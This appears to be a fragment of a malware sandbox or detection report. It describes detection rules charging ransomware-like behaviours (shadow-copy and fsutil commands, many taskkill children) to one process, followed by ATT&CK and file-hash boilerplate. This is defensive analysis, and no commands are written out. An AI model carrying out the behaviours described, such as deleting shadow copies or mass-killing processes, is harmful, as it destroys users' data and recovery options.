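Running `analyze(sample_events())` charges every finding to PID 1664 (eight distinct behaviours, thirteen taskkill children) and nothing to the explorer.exe chain. The rules match on intent rather than on outcome: the shadow-copy and fsutil rules fire on the recorded command lines even though, as noted above, neither command would have worked as written, which is the right call for detection content since the next build of the sample may fix the string.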
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 1KB
  MD5: 457ae8f12b448de3a2c4bb18146ae744
  SHA1: 0ba6ffc29c94e4f04f795b2df28bba23ba350cc9
  SHA256: cc1ae0b34340478701b48203c553dac85d83ca4ad8639dba01e64d3d4f1788af
  SHA512: 75e3d215aced22fd0249c257f35da84fd4dc2fcce3c69815f55f770486fe1cb6c673e4b08c817e9e78bec2fa0d57ee9cbe8077a01d9e2df660b1899f3134a7a9
- Filesize: 410KB
  MD5: 7508f2fd88f4196aeeeee65b19805435
  SHA1: 213f660409f7ee21dd55ce00414c53bebea633dc
  SHA256: ed40c66f94519096100665682ec7be14108aa1a241c658df5f6736204c79c6f6
  SHA512: a00d5b4390a4f67ed12abace9b7f79bf7e242684ac8c644ec2bf71641100c549811919d504dca416b539127dc9a849d5beeb2a375b52efab0dcb71c621f00c7d